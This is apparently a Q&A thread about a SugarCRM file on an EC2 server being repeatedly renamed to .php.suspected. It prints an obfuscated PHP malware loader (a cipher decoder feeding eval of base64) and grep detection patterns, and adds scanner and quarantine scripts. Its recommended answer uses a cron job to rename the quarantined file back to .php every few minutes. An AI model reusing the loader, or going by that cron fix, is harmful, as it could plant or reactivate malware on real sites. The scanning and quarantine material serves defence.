php file automatically renamed to php.suspected


Problem description

For the last 4 days, we have been facing a strange issue on our production server (AWS EC2 instance), specific to only one site, which is SugarCRM.

The issue is that the file /home/site_folder/public_html/include/MassUpdate.php is automatically renamed to /home/site_folder/public_html/include/MassUpdate.php.suspected.

This happens 2-3 times a day with a gap of 3-4 hours. The issue occurs only for this specific site; it does not occur even for the staging replica of the same site. I even compared the code of that file on both sites, and it is the same.

We have Googled and found that such issues occur mostly for WordPress sites and could be caused by an attack. But we checked our server for an attack, and there isn't any. Also, there is no virus/malware scan running on the server.

What should we do?

Update: We found a few things after going through this link. We executed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ and found that there are a few files with the following sample code.

    <?php
    function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
    $ixo="base64_decode";return $ixo($ggy);}
    $s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
    '0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
    $koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
    eval(flnftovr($s, $koicev));?>

Seems to be some malware; how do we go about removing it permanently?

Thanks
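The egrep in the question's update flags files whose decoder loop sits on a single line. The script below is an added example, not code from the question or the answer: it wraps that same signature in a reusable scan, adds a second pattern for the `$var="base64_decode"` indirection visible in the posted sample (which a plain search for `base64_decode(` would miss), and builds a small constructed web root so the scan can be exercised offline. The directory names, the file x7k2.php and the variable-name character class are assumptions made for the demo.

```shell
#!/bin/sh
# Added example (not from the question or answer): scan a web root for the
# one-line decoder signature the question found with egrep, plus the
# $var="base64_decode" indirection from the posted sample.
# The directory layout and sample files below are constructed for the demo.

# Signature 1: the substitution-map decoder loop, as in the question's egrep.
SIG_DECODER='function.*for.*strlen.*isset'
# Signature 2: the function name hidden in a string so a grep for
# base64_decode( would miss it (assumption: PHP variable names are [A-Za-z_]).
SIG_INDIRECT='\$[A-Za-z_][A-Za-z0-9_]*="base64_decode"'

# scan_obfuscated DIR: print every .php file under DIR matching either signature
scan_obfuscated() {
    grep -rlE --include='*.php' -e "$SIG_DECODER" -e "$SIG_INDIRECT" "$1" 2>/dev/null | sort -u
}

# count_obfuscated DIR: number of flagged files (0 when the tree is clean)
count_obfuscated() {
    scan_obfuscated "$1" | wc -l | tr -d ' '
}

# make_sample_tree: build a constructed web root with one clean file and one
# dropped decoder file; prints the root path
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/include" "$root/cache"
    # clean file: uses isset and strlen, but not in the decoder shape
    cat > "$root/include/MassUpdate.php" <<'EOF'
<?php
function clean_name($name) {
    return isset($name) && strlen($name) > 0 ? trim($name) : '';
}
EOF
    # constructed file with the same decoder shape as the question's sample
    cat > "$root/cache/x7k2.php" <<'EOF'
<?php
function dcd($a, $b){$o=''; for($i=0; $i < strlen($a); $i++){$o .= isset($b[$a[$i]]) ? $b[$a[$i]] : $a[$i];}
$f="base64_decode";return $f($o);}
EOF
    echo "$root"
}

# usage: sh scan_obfuscated.sh /home/username/public_html
if [ -n "${1:-}" ]; then
    scan_obfuscated "$1"
fi
```

Run it against the real document root and review every path it prints before deleting anything; a hit in a cache or upload directory that the application itself never writes PHP into is the kind of result worth checking first.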

Recommended answer

Posting this answer; it may help others.

  1. Create a file with the '.sh' extension at a convenient location.
  2. Add the following code to it.

    #!/bin/sh
    # Rename your_file_name.php.suspected to your_file_name.php
    mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php

  3. Save this file.
  4. Set up a cron job with the following line in crontab, running every 10 minutes (or the interval you need):

    */10 * * * * path_to_cron_file.sh

  5. Restart the crontab service.

You will find a lot of documentation on creating cron jobs on Google.
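The question notes that the staging replica of the same site has an identical, unmodified copy of MassUpdate.php. The script below is an added example, not the answer's script: instead of renaming every .suspected file straight back, it restores the file only when its SHA-256 matches a known-good copy (such as the staging replica), and otherwise moves it into a quarantine directory outside the web root so a changed file is never put back into service. The path arguments, the quarantine directory and the timestamp suffix are assumptions for the demo.

```shell
#!/bin/sh
# Added example (not the answer's script): restore file.php.suspected only
# when it is byte-identical to a known-good copy, e.g. the staging replica
# the question mentions; otherwise quarantine it. All paths are placeholders.

# sha256_of FILE: print the SHA-256 hex digest (falls back to shasum on systems without sha256sum)
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1"
    else
        shasum -a 256 "$1"
    fi | cut -d' ' -f1
}

# restore_if_clean SUSPECTED_PATH KNOWN_GOOD_PATH QUARANTINE_DIR
# returns 0 if restored, 1 if quarantined, 2 if there was nothing to do
restore_if_clean() {
    suspected="$1"; good="$2"; quarantine="$3"
    original="${suspected%.suspected}"      # strip the .suspected suffix
    [ -f "$suspected" ] || return 2
    if [ "$(sha256_of "$suspected")" = "$(sha256_of "$good")" ]; then
        # content matches the known-good copy: safe to put back
        mv "$suspected" "$original"
        return 0
    fi
    # content differs: keep it for analysis, out of the document root
    mkdir -p "$quarantine"
    mv "$suspected" "$quarantine/$(basename "$original").$(date +%s)"
    return 1
}

# usage: sh restore_if_clean.sh /path/file.php.suspected /staging/path/file.php /var/quarantine
if [ $# -eq 3 ]; then
    restore_if_clean "$1" "$2" "$3"
fi
```

This script can take the place of the bare mv in the cron line above; the quarantine directory should sit outside public_html so nothing moved there is reachable over HTTP, and a non-zero exit from the job is the signal to look at what was quarantined.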
